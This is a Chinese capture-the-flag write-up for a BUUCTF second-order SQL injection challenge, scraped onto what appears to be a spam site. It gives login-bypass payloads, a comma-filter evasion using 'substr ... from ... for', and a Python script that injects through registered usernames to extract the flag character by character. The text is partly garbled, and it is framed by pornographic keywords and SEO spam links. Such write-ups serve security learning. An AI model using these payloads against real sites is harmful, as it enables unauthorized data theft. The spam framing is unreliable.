中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

給網(wǎng)站做引流多少錢2023年中國進(jìn)入一級(jí)戰(zhàn)備狀態(tài)了嗎

給網(wǎng)站做引流多少錢,2023年中國進(jìn)入一級(jí)戰(zhàn)備狀態(tài)了嗎,網(wǎng)站前端切圖做多個(gè)頁面,wordpress grace主題一、環(huán)境:在線測(cè)試平臺(tái) BUUCTF在線評(píng)測(cè) (buuoj.cn) 二、進(jìn)入界面先嘗試萬能賬號(hào) 1or11# 換格式 hais1bux1 11or11# 三、萬能的不行那我們就得想注冊(cè)了,去register.php去看看 注冊(cè)個(gè)賬號(hào) 發(fā)現(xiàn)用戶名回顯,猜測(cè)考點(diǎn)為用戶名處二次注入&…

一、環(huán)境:在線測(cè)試平臺(tái)

BUUCTF在線評(píng)測(cè) (buuoj.cn)

二、進(jìn)入界面先嘗試萬能賬號(hào)

1'or'1'='1'#

換格式 hais1bux1

1@1'or'1'='1'#

?

三、萬能的不行那我們就得想注冊(cè)了,去register.php去看看?

注冊(cè)個(gè)賬號(hào)

?發(fā)現(xiàn)用戶名回顯,猜測(cè)考點(diǎn)為用戶名處二次注入,再次注冊(cè)

?

很明顯是有的?

?

三、如何解決?

在mysql中我們熟知一點(diǎn)是,+可以當(dāng)做運(yùn)算符 ,比如我們執(zhí)行

select ‘1’+‘2a’

返回值為空

select '0'+database();

?

當(dāng)我們用ASCII值來計(jì)算時(shí),此時(shí)出現(xiàn)庫第一位s的ASCII碼值

select '0'+ascii(substr(database(),1,1));

因?yàn)轭}目中過濾掉了逗號(hào),因此用from for來代替

0'+ascii(substr(database() from 1 for 1))+'0;

成功回顯,因?yàn)檫^濾了information,只能猜字段名為flag,所以去用python腳本爬

腳本如下:

# -*- coding:utf-8 -*-
"""
@Author: lingchenwudiandexing
@contact: 3131579667@qq.com
@Time: 2024/2/19 1:04
@version: 1.0
"""
import requests
import logging
import re
from time import sleep# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"
# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)def search():flag = ''url = 'http://19f46d59-6746-4dce-84c1-73a67354f6d1.node5.buuoj.cn/'url1 = url+'register.php'url2 = url+'login.php'for i in range(100):sleep(0.3)#不加sleep就429了QAQdata1 = {"email" : "1234{}@123.com".format(i), "username" : "0'+ascii(substr((select * from flag) from {} for 1))+'0;".format(i), "password" : "123"}data2 = {"email" : "1234{}@123.com".format(i), "password" : "123"}r1 = requests.post(url1, data=data1)r2 = requests.post(url2, data=data2)res = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r2.text)res1 = re.search(r'\d+', res.group())flag = flag+chr(int(res1.group()))print(flag)print("final:"+flag)if __name__ == '__main__':search()

四、最終答案:

?

http://www.risenshineclean.com/news/4414.html

相關(guān)文章:

  • 怎么做網(wǎng)站編程高質(zhì)量外鏈
  • 嘉興個(gè)人建站seo主要做什么工作
  • 我的世界做指令的網(wǎng)站網(wǎng)站優(yōu)化的方式有哪些
  • 怎么查看網(wǎng)站根目錄深圳seo排名哪家好
  • 石家莊招聘哪個(gè)網(wǎng)站做的好公司軟文推廣
  • 展廳設(shè)計(jì)策劃方案南寧正規(guī)的seo費(fèi)用
  • 公司企業(yè)網(wǎng)站的選擇seo專員工作內(nèi)容
  • 網(wǎng)站免費(fèi)空間免備案培訓(xùn)機(jī)構(gòu)學(xué)校
  • 百度搜索引擎收錄入口seo銷售好做嗎
  • 手機(jī)動(dòng)態(tài)網(wǎng)站模板網(wǎng)絡(luò)營銷推廣方案論文
  • 南京裝修公司做網(wǎng)站武漢關(guān)鍵詞排名推廣
  • 寧波seo推廣優(yōu)化提升seo排名
  • 江蘇省常州建設(shè)高等職業(yè)技術(shù)學(xué)校網(wǎng)站軟文推廣經(jīng)典案例
  • wordpress 流媒體seo關(guān)鍵詞排名優(yōu)
  • 關(guān)于做公司網(wǎng)站建設(shè)你應(yīng)該知道的seo每日一貼
  • 網(wǎng)站實(shí)現(xiàn)seo公司發(fā)展前景
  • 企業(yè)免費(fèi)建站網(wǎng)站網(wǎng)站如何添加友情鏈接
  • 網(wǎng)站建設(shè)與網(wǎng)頁設(shè)計(jì)論述題用html制作淘寶網(wǎng)頁
  • 江山網(wǎng)站建設(shè)百度網(wǎng)盤客服
  • 網(wǎng)站建設(shè)sem怎么做google seo優(yōu)化
  • 上線了做網(wǎng)站怎么樣許昌seo公司
  • 網(wǎng)站編程語言站長工具查詢官網(wǎng)
  • 教做美甲的網(wǎng)站查詢網(wǎng)站流量的網(wǎng)址
  • 手機(jī)商城網(wǎng)站建設(shè)策劃方案范文seo優(yōu)化工作內(nèi)容做什么
  • 互聯(lián)網(wǎng)門戶網(wǎng)站是什么意思上海關(guān)鍵詞優(yōu)化排名軟件
  • 靠網(wǎng)站點(diǎn)擊就能賺錢的做企業(yè)網(wǎng)絡(luò)推廣計(jì)劃書
  • 企業(yè)網(wǎng)站的布局類型品牌策劃方案怎么做
  • 做網(wǎng)站的職位公司域名注冊(cè)查詢
  • 帶后臺(tái)管理的網(wǎng)站模板打開搜索引擎
  • 做貨代在哪些網(wǎng)站能找到客戶推廣app用什么平臺(tái)比較好